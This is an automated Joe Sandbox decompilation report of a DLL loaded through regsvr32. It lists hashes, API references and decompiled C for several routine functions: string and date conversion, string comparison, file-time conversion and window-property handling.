Instruction ID: 7417387f7adf37fe1ab59bca72900dfb677c733efe825dd1796ab54f4d190ed7
Opcode Fuzzy Hash: 1eead9d3d03242078f237fd557833f643aded1042b9e5545cf348de1b444caac
Instruction Fuzzy Hash: 49316F72500206BFD710DFA4C885E9AB7F8FB04350F204A3AF556D7191E7B0E984CB94

Uniqueness

Uniqueness Score: -1.00%

Function 10017F67 Relevance: 6.1, APIs: 4, Instructions: 75
stringCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E10017F67(intOrPtr* __ecx) {
				CHAR* _t22;
				short* _t34;
				intOrPtr* _t41;
				int _t44;
				int _t46;
				void* _t48;
				short* _t50;

				E1001A9E0(0x10077d90, _t48);
				_push(__ecx);
				_t41 = __ecx;
				_t37 = _t48 + 8;
				E1004598C(_t48 + 8, _t48,  *(_t48 + 8));
				_t22 =  *(_t48 + 8);
				_t44 = 0;
				 *(_t48 - 4) = 0;
				 *(_t48 - 0x10) = _t22;
				if(_t22 != 0) {
					_t46 = lstrlenA(_t22) + 1;
					E1001B2B0(_t46 + _t46 + 0x00000003 & 0x000000fc, _t37);
					_t34 = _t50;
					 *_t34 = 0;
					_t22 = MultiByteToWideChar(0, 0,  *(_t48 - 0x10), 0xffffffff, _t34, _t46);
					_t44 = 0;
				} else {
					_t34 = 0;
				}
				__imp__#104(_t34,  *((intOrPtr*)(_t48 + 0x10)),  *((intOrPtr*)(_t48 + 0xc)), _t41);
				if(_t22 >= _t44) {
					L12:
					 *((intOrPtr*)(_t41 + 8)) = _t44;
					_t44 = 1;
					goto L13;
				} else {
					if(_t22 != 0x80020005) {
						if(_t22 != 0x8002000a) {
							if(_t22 != 0x8007000e) {
								L1006932B(_t37, _t22);
							} else {
								E1003743B(_t37);
							}
							goto L12;
						}
						 *((intOrPtr*)(_t41 + 4)) = 0x80000000;
						L6:
						 *_t41 = _t44;
						 *((intOrPtr*)(_t41 + 8)) = 1;
						L13:
						 *(_t48 - 4) =  *(_t48 - 4) | 0xffffffff;
						E1004591E(_t48 + 8);
						 *[fs:0x0] =  *((intOrPtr*)(_t48 - 0xc));
						return _t44;
					}
					 *((intOrPtr*)(_t41 + 4)) = _t44;
					goto L6;
				}
			}

0x10017f6c
0x10017f71
0x10017f75
0x10017f7a
0x10017f7d
0x10017f82
0x10017f85
0x10017f89
0x10017f8c
0x10017f8f
0x10017f9e
0x10017fa7
0x10017fac
0x10017fb7
0x10017fbc
0x10017fc2
0x10017f91
0x10017f91
0x10017f91
0x10017fcc
0x10017fd4
0x1001800f
0x10018011
0x10018014
0x00000000
0x10017fd6
0x10017fdb
0x10017ff0
0x10018000
0x1001800a
0x10018002
0x10018002
0x10018002
0x00000000
0x10018000
0x10017ff2
0x10017fe0
0x10017fe0
0x10017fe2
0x10018015
0x10018015
0x1001801c
0x10018029
0x10018034
0x10018034
0x10017fdd
0x00000000
0x10017fdd

APIs

__EH_prolog.LIBCMT ref: 10017F6C
lstrlenA.KERNEL32(?,?), ref: 10017F96
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000001), ref: 10017FBC
VarCyFromStr.OLEAUT32(?,?,?), ref: 10017FCC

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: ByteCharFromH_prologMultiWidelstrlen
String ID:
API String ID: 1371960859-0
Opcode ID: 6c5f3c24b78fe00929225e92105635d9974719419917254a067c050da17f1db7
Instruction ID: 02473b90c86cba4810f0c49396b0bc5e81bc99b5a28bdc4e43828ba597d93168
Opcode Fuzzy Hash: 6c5f3c24b78fe00929225e92105635d9974719419917254a067c050da17f1db7
Instruction Fuzzy Hash: 9E21C57150012AABCB21CF64CC85A9EBBB8FF083A4F21451AF419DA151C774DA85C790

Uniqueness

Uniqueness Score: -1.00%

Function 100664F3 Relevance: 6.1, APIs: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E100664F3(intOrPtr _a4, intOrPtr _a8) {
				void* __ebx;
				void* _t29;
				intOrPtr _t32;
				intOrPtr _t35;

				_t32 = _a8;
				if(_t32 != 0) {
					_push(_t29);
					_t35 = _a4;
					E1001ACB0(_t29, _t35, _t32, 0x2c);
					E1001ACB0(_t29, _t35 + 0x30, _t32 + 0x34, 5);
					WideCharToMultiByte(0, 0, _t32 + 0x2c, 1, _t35 + 0x2c, 1, 0, 0);
					WideCharToMultiByte(0, 0, _t32 + 0x2e, 1, _t35 + 0x2d, 1, 0, 0);
					WideCharToMultiByte(0, 0, _t32 + 0x30, 1, _t35 + 0x2e, 1, 0, 0);
					WideCharToMultiByte(0, 0, _t32 + 0x32, 1, _t35 + 0x2f, 1, 0, 0);
					return _t35;
				}
				return 0;
			}

0x100664f5
0x100664fd
0x10066503
0x10066505
0x1006650d
0x1006651c
0x1006653a
0x1006654c
0x1006655e
0x10066570
0x00000000
0x10066575
0x00000000

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,00000001,00000000,00000000), ref: 1006653A
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,00000001,00000000,00000000), ref: 1006654C
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,00000001,00000000,00000000), ref: 1006655E
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,00000001,00000000,00000000), ref: 10066570

Memory Dump Source

Source File: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 6989bc9e328a5a087cbb5abaaf143cdaf69a8b3a5f60d7b6654b550c502036a3
Instruction ID: 5326dab5a69358f702c28dbb5f7d43ab15c43ec4f4e27b5ad7586c116506af65
Opcode Fuzzy Hash: 6989bc9e328a5a087cbb5abaaf143cdaf69a8b3a5f60d7b6654b550c502036a3
Instruction Fuzzy Hash: A5118E7225060D7FE620DA91CCC1FD7B79DFB4E788F010516B70AE6480E6A2F94487B0

Uniqueness

Uniqueness Score: -1.00%

Function 10018BF3 Relevance: 6.1, APIs: 4, Instructions: 73
stringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E10018BF3(long long* __ecx, long long __fp0) {
				CHAR* _t20;
				long long* _t32;
				short* _t39;
				int _t45;
				void* _t46;
				short* _t48;
				long long _t56;

				_t56 = __fp0;
				E1001A9E0(0x10077dec, _t46);
				_push(__ecx);
				_t32 = __ecx;
				_t35 = _t46 + 8;
				E1004598C(_t46 + 8, _t46,  *(_t46 + 8));
				_t20 =  *(_t46 + 8);
				_t39 = 0;
				 *(_t46 - 4) = 0;
				 *(_t46 - 0x10) = _t20;
				if(_t20 != 0) {
					_t45 = lstrlenA(_t20) + 1;
					E1001B2B0(_t45 + _t45 + 0x00000003 & 0x000000fc, _t35);
					_t39 = _t48;
					 *_t39 = 0;
					_t20 = MultiByteToWideChar(0, 0,  *(_t46 - 0x10), 0xffffffff, _t39, _t45);
				}
				__imp__#94(_t39,  *((intOrPtr*)(_t46 + 0x10)),  *((intOrPtr*)(_t46 + 0xc)), _t32);
				if(_t20 >= 0) {
					L11:
					_push(1);
					 *((intOrPtr*)(_t32 + 8)) = 0;
					_pop(0);
					goto L12;
				} else {
					if(_t20 != 0x80020005) {
						if(_t20 != 0x8002000a) {
							if(_t20 != 0x8007000e) {
								L1006932B(_t35, _t20);
							} else {
								E1003743B(_t35);
							}
							goto L11;
						}
						_t56 =  *0x1007ec88;
						L5:
						 *_t32 = _t56;
						 *((intOrPtr*)(_t32 + 8)) = 1;
						L12:
						 *(_t46 - 4) =  *(_t46 - 4) | 0xffffffff;
						E1004591E(_t46 + 8);
						 *[fs:0x0] =  *((intOrPtr*)(_t46 - 0xc));
						return 0;
					}
					asm("fldz");
					goto L5;
				}
			}

0x10018bf3
0x10018bf8
0x10018bfd
0x10018c01
0x10018c06
0x10018c09
0x10018c0e
0x10018c11
0x10018c15
0x10018c18
0x10018c1b
0x10018c26
0x10018c2f
0x10018c34
0x10018c3f
0x10018c44
0x10018c44
0x10018c52
0x10018c5c
0x10018c95
0x10018c95
0x10018c97
0x10018c9a
0x00000000
0x10018c5e
0x10018c63
0x10018c77
0x10018c86
0x10018c90
0x10018c88
0x10018c88
0x10018c88
0x00000000
0x10018c86
0x10018c79
0x10018c67
0x10018c67
0x10018c69
0x10018c9b
0x10018c9b
0x10018ca2
0x10018caf
0x10018cba
0x10018cba
0x10018c65
0x00000000
0x10018c65

APIs

__EH_prolog.LIBCMT ref: 10018BF8
lstrlenA.KERNEL32(?,?), ref: 10018C1E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000001), ref: 10018C44
VarDateFromStr.OLEAUT32(00000000,?,?), ref: 10018C52

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: ByteCharDateFromH_prologMultiWidelstrlen
String ID:
API String ID: 3029302593-0
Opcode ID: 678b0d8b5a72117dbb9a3d327a15354204c70d654a406599ee1cf5ec13c7650e
Instruction ID: c4ae87d5e4a66546251743322a08a7636694a706d347f011c58fd9cee8a81187
Opcode Fuzzy Hash: 678b0d8b5a72117dbb9a3d327a15354204c70d654a406599ee1cf5ec13c7650e
Instruction Fuzzy Hash: BF21DE71800116ABDB10DF94CC85AAEBBB8FF093A4F214516F919DE261DB35DBC1C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 10029430 Relevance: 6.1, APIs: 4, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E10029430(void* __ecx) {
				int _t30;
				void* _t40;
				int _t42;
				short* _t44;
				int _t45;
				int _t48;
				void* _t49;
				short* _t51;

				_t40 = __ecx;
				_t51 =  *(_t49 - 0x18);
				 *(_t49 - 0x24) = 0;
				 *(_t49 - 4) =  *(_t49 - 4) | 0xffffffff;
				_t45 =  *(_t49 + 0x14);
				_t42 = 1;
				if( *(_t49 - 0x24) == 0 || MultiByteToWideChar( *(_t49 + 0x20), _t42,  *(_t49 + 0x10), _t45,  *(_t49 - 0x24),  *(_t49 - 0x1c)) == 0) {
					L8:
					_t30 = 0;
				} else {
					_t48 = MultiByteToWideChar( *(_t49 + 0x20), 9,  *(_t49 + 0x18),  *(_t49 + 0x1c), 0, 0);
					 *(_t49 - 0x20) = _t48;
					if(_t48 == 0) {
						goto L8;
					} else {
						 *(_t49 - 4) = _t42;
						E1001B2B0(_t48 + _t48 + 0x00000003 & 0x000000fc, _t40);
						 *(_t49 - 0x18) = _t51;
						_t44 = _t51;
						 *(_t49 - 0x28) = _t44;
						 *(_t49 - 4) =  *(_t49 - 4) | 0xffffffff;
						if(_t44 == 0 || MultiByteToWideChar( *(_t49 + 0x20), 1,  *(_t49 + 0x18),  *(_t49 + 0x1c), _t44, _t48) == 0) {
							goto L8;
						} else {
							_t30 = CompareStringW( *(_t49 + 8),  *(_t49 + 0xc),  *(_t49 - 0x24),  *(_t49 - 0x1c), _t44, _t48);
						}
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t49 - 0x10));
				return _t30;
			}

0x10029430
0x10029430
0x10029435
0x10029438
0x1002943c
0x10029441
0x10029445
0x100294de
0x100294de
0x10029465
0x10029474
0x10029476
0x1002947b
0x00000000
0x1002947d
0x1002947d
0x10029488
0x1002948d
0x10029490
0x10029492
0x10029495
0x100294af
0x00000000
0x100294c8
0x100294d6
0x100294d6
0x100294af
0x1002947b
0x100294e6
0x100294f1

APIs

MultiByteToWideChar.KERNEL32(?,00000001,00000000,0000000B,?,?,?,10023F0A), ref: 1002945F
MultiByteToWideChar.KERNEL32(00000000,00000009,?,00000000,00000000,00000000,?,10023F0A), ref: 10029472
MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,?,00000000,?,10023F0A), ref: 100294BE
CompareStringW.KERNEL32(?,?,00000000,00000000,?,00000000,?,00000000,?,10023F0A), ref: 100294D6

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: ByteCharMultiWide$CompareString
String ID:
API String ID: 376665442-0
Opcode ID: 5aed0d33dde31dfb6b3c8c1aaf109a96f089854dbf37ae079a533a42dee2f419
Instruction ID: 65b8b033b116c4475c57dc441f672db1deef807bf11815e3b684eb821ce57fd4
Opcode Fuzzy Hash: 5aed0d33dde31dfb6b3c8c1aaf109a96f089854dbf37ae079a533a42dee2f419
Instruction Fuzzy Hash: FF21493280021EEBCF219F94DD819DEBFB6FF483A0F114165FA1462160C3329922DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 100493A9 Relevance: 6.1, APIs: 4, Instructions: 66
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100493A9(intOrPtr _a4, struct _FILETIME* _a8) {
				struct _FILETIME _v12;
				struct _SYSTEMTIME _v28;
				void* __edi;
				void* __esi;
				intOrPtr* _t30;
				int _t36;

				_t47 = _a4;
				_v28.wYear =  *((intOrPtr*)(E10037FAC(_a4, 0, 0) + 0x14)) + 0x76c;
				_v28.wMonth =  *((intOrPtr*)(E10037FAC(_t47, 0, 0) + 0x10)) + 1;
				_v28.wDay =  *((intOrPtr*)(E10037FAC(_t47, 0, 0) + 0xc));
				_v28.wHour =  *((intOrPtr*)(E10037FAC(_t47, 0, 0) + 8));
				_v28.wMinute =  *((intOrPtr*)(E10037FAC(_t47, 0, 0) + 4));
				_t30 = E10037FAC(_t47, 0, 0);
				_v28.wMilliseconds = 0;
				_v28.wSecond =  *_t30;
				if(SystemTimeToFileTime( &_v28,  &_v12) == 0) {
					E10048CC6(GetLastError(), 0);
				}
				_t36 = LocalFileTimeToFileTime( &_v12, _a8);
				if(_t36 == 0) {
					return E10048CC6(GetLastError(), 0);
				}
				return _t36;
			}

0x100493b1
0x100493c9
0x100493d9
0x100493e9
0x100493f9
0x10049409
0x1004940d
0x10049415
0x10049419
0x10049433
0x10049439
0x10049439
0x10049445
0x1004944d
0x00000000
0x10049453
0x1004945b

APIs

SystemTimeToFileTime.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 10049425
GetLastError.KERNEL32(00000000), ref: 10049436
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 10049445
GetLastError.KERNEL32(00000000), ref: 10049450

Memory Dump Source

Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Time$File$ErrorLast$LocalSystem
String ID:
API String ID: 1172841412-0
Opcode ID: a62ea8bb23c5790c3bd238a739c847c5ae5f5a1ebb23faf52209beacd4d83a3a
Instruction ID: 2911ce4cc5894fdcd0882bf6d80abc11b4ed267c1a80c1cdbd69dbbc7430f524
Opcode Fuzzy Hash: a62ea8bb23c5790c3bd238a739c847c5ae5f5a1ebb23faf52209beacd4d83a3a
Instruction Fuzzy Hash: 38117F29A102156A8F11EBE9CC45CDFB7BDFFC8200B054056F909DB221EB30D601CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 1002AEC0 Relevance: 6.1, APIs: 4, Instructions: 65
windowCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E1002AEC0(void* __eflags, struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v4;
				void* _t10;
				long _t13;
				long _t21;
				struct HWND__* _t25;

				_t25 = _a4;
				_t10 = E1002A340(_t25);
				_t31 = _t10;
				if(_t10 != 0) {
					_t13 = GetPropA(_t25, 0);
					__eflags = _t13;
					if(_t13 == 0) {
						_t21 =  &_v4;
						_v4 = 0x29a;
						_t13 = SendMessageA(_t25, 0x1944, 0, _t21);
						__eflags = _v4 - 0x29a;
						if(_v4 == 0x29a) {
							_t13 = SendMessageA(_t25, 0x1943, 0, _t21);
							__eflags = _v4 - 0x29a;
							if(_v4 == 0x29a) {
								__eflags = 0;
								RemovePropA(_t25, 0);
								_push(_a12);
								_push(0);
								_push(_a8);
								_push(_t25);
								return E1002C050(__eflags);
							}
						}
					}
					return _t13;
				} else {
					_push(_a12);
					_push(0);
					_push(_a8);
					_push(_t25);
					return E1002C050(_t31);
				}
			}

0x1002aec5
0x1002aecb
0x1002aed3
0x1002aed5
0x1002aefd
0x1002af03
0x1002af05
0x1002af07
0x1002af11
0x1002af22
0x1002af24
0x1002af2c
0x1002af37
0x1002af39
0x1002af41
0x1002af43
0x1002af4d
0x1002af5c
0x1002af5d
0x1002af5f
0x1002af60
0x00000000
0x1002af66
0x1002af41
0x1002af2c
0x1002af6f
0x1002aed7
0x1002aedf
0x1002aee0
0x1002aee2
0x1002aee3
0x1002aef2
0x1002aef2

APIs

GetPropA.USER32(?,00000000), ref: 1002AEFD
SendMessageA.USER32 ref: 1002AF22
SendMessageA.USER32 ref: 1002AF37
RemovePropA.USER32(?,00000000), ref: 1002AF4D

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: MessagePropSend$Remove
String ID:
API String ID: 2793251306-0
Opcode ID: cd8a595fb3dc81c0b0259a6e42745b281a69a06418c739c4dc26dc05c5763081
Instruction ID: 985336236b1fefc0ae1517fadc6746516a1bef70be0dfc6b17671bbe426bb86d
Opcode Fuzzy Hash: cd8a595fb3dc81c0b0259a6e42745b281a69a06418c739c4dc26dc05c5763081
